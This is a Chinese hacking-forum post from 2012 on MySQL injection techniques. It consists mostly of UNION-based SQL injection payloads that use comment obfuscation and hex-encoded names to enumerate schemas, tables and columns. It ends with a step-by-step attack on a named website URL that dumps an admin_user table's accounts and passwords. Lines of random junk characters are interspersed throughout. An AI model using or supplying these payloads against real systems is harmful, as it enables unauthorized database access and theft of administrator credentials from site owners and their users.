找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1809|回复: 0
打印 上一主题 下一主题

mysql注入技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:29:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
查库
2 t' W3 m7 c% `6 g8 B# X+ m: r, j7 I+ |( v- V& [# i& _) v; N
id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*" e' d  c' }$ [- P& ^

8 q/ O' v. X6 l7 F! C查表
, |: T: w1 y8 V/ Z: \3 G. l
; k% j# g: J0 v( C9 Did=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
% q# u! l# B8 p  w' k
' r; u" ~' e; ]' S查段
2 s! \  W2 y& b# e+ C! _2 O
( j7 e) Y% ^- |id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
) d1 y, Y2 U* m1 R+ Y: s) W' n7 A- @1 D  P
! b( l# J  Y# `6 G- U7 e+ e! e
mysql5高级注入方法暴表
4 v$ O, Z; U% b0 D2 G& z: C! L
5 R* A9 h, x0 F1 H2 q1 B例子如下:
9 k' Z: A$ T. F7 C. n, ~% D
# G& n5 v3 |6 I8 a1.爆表# G. _, T( u$ p  d
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)' [8 A) k8 S5 [+ Z
这样爆到第4个时出现了admin_user表。
* {, ]/ i& K* j! R6 a$ ^1 j9 [( T. e, w; V
2.暴字段
0 P8 w7 V: F- X6 xhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
# J# a1 l8 y0 a6 j1 U) ]/ z9 S( T" S# Y( s7 O$ R6 Y- u

( C$ D3 H$ J; x7 u! V3.爆密码5 V0 o+ b! e/ x& o$ V& ?9 `
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 6 d( k4 s5 J; W! F# w

  g% M$ [" X% A' P; ]3 f
+ p+ S! [0 J5 J8 X. l( a+ f% U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表